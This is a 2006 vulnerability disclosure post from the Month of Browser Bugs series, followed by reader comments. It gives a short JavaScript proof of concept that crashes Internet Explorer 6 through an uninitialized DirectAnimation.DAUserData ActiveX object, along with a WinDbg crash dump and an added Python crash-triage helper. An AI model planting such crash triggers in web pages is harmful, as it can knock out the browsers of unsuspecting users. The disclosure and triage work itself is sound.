Saturday, July 08, 2006

MoBB #9: DirectAnimation.DAUserData Data

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The "Data" property of the DAUserData object is designed to be accessed only after it has been initialized. We can trigger a NULL dereference by asking for it without calling the Init() method first.

var a = new ActiveXObject('DirectAnimation.DAUserData');
// Init() is never called, so the object's internal state is still uninitialized
a.Data = 'Hello';

Demonstration

eax=00000000 ebx=5a327320 ecx=00000000
edx=0003b7c8 esi=00000000 edi=0003f1cc
eip=5a3415b6 esp=0013b1a4 ebp=0013b1b4
danim!CRUserDataImpl::GetData+0x5:
5a3415b6 837e0800 cmp dword ptr [esi+0x8],0x0 ds:0023:00000008=????????
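Added example, not part of the original post: a small Python triage helper that parses a WinDbg register dump like the one above, computes the effective address of the faulting memory operand, cross-checks it against WinDbg's own ds: annotation and classifies the access as a NULL dereference when it falls in the unmapped low 64 KiB. The sample input is the dump quoted above; the 64 KiB threshold is an assumption, and the parser handles the general [reg+disp] operand form, not only this crash.

```python
import re

# Constructed sample input: the WinDbg register/instruction dump quoted in the post above.
SAMPLE_DUMP = """\
eax=00000000 ebx=5a327320 ecx=00000000
edx=0003b7c8 esi=00000000 edi=0003f1cc
eip=5a3415b6 esp=0013b1a4 ebp=0013b1b4
danim!CRUserDataImpl::GetData+0x5:
5a3415b6 837e0800 cmp dword ptr [esi+0x8],0x0 ds:0023:00000008=????????
"""

REG_RE = re.compile(r'\b(e[a-d]x|e[sd]i|e[sb]p|eip)=([0-9a-fA-F]{8})')
# Memory operand of the faulting instruction: [reg], [reg+disp] or [reg-disp]
MEM_RE = re.compile(r'\[(e[a-d]x|e[sd]i|e[sb]p)(?:([+-])(0x[0-9a-fA-F]+|\d+))?\]')
# Symbol line WinDbg prints before the instruction, e.g. "module!Class::Method+0x5:"
SYM_RE = re.compile(r'^([\w.]+![\w:~]+(?:\+0x[0-9a-fA-F]+)?):\s*$', re.MULTILINE)
# WinDbg's own "ds:0023:00000008=????????" note of the address it failed to read
DS_RE = re.compile(r'\bds:[0-9a-fA-F]{4}:([0-9a-fA-F]{8})=')
# Assumption: 32-bit user-mode Windows never maps the first 64 KiB, so an access
# below this limit is treated as a NULL pointer plus a small field offset.
NULL_PAGE_LIMIT = 0x10000

def parse_registers(dump):
    # {register: value} for every reg=hex pair in the dump
    return {name: int(val, 16) for name, val in REG_RE.findall(dump)}

def effective_address(dump, regs):
    # (base register, base + displacement) of the faulting operand, or None
    m = MEM_RE.search(dump)
    if not m or m.group(1) not in regs:
        return None
    base, sign, disp = m.groups()
    offset = int(disp, 0) if disp else 0
    if sign == '-':
        offset = -offset
    return base, (regs[base] + offset) & 0xFFFFFFFF

def triage(dump):
    # Classify the crash as null-deref, wild-pointer or unknown
    regs = parse_registers(dump)
    ea = effective_address(dump, regs)
    if ea is None:
        return {"class": "unknown"}
    base, addr = ea
    sym = SYM_RE.search(dump)
    ds = DS_RE.search(dump)
    reported = int(ds.group(1), 16) if ds else None  # WinDbg's figure, should equal addr
    return {"class": "null-deref" if addr < NULL_PAGE_LIMIT else "wild-pointer",
            "base": base, "address": addr, "symbol": sym.group(1) if sym else None,
            "reported": reported, "consistent": reported is None or reported == addr}
```

For this dump the helper reports a null-deref through esi+0x8 at address 8, matching WinDbg's ds: annotation, which is the signature of an object field read before the object was initialized.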

This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE DirectAnimation.DAUserData Data Property NULL Dereference

3 Comments:

At 9:47 AM, Anonymous Anonymous said...

When will browser bugs be regulated to the likes of SQL injection and XSS attacks?

I mean isn't this just as bad as picking on Joe Bob's php application for its file include problem, or kicking a small dog?

Are you going to do a month of excel vulns, or word doc vulns, or ppt vulns? I'd like to see those things die away also.

At 10:32 AM, Blogger hdm said...

I think the small dog would agree that this is better.
The MoBB project should help in killing off the really obvious bugs and hopefully the fuzzing tools will be used by the vendors to ensure that they stay dead.

At 5:46 PM, Anonymous Anonymous said...

The buggy ActiveX control is not present on my XPSP2 system, thus no IE6 crashing.

IE7 doesn't crash either.

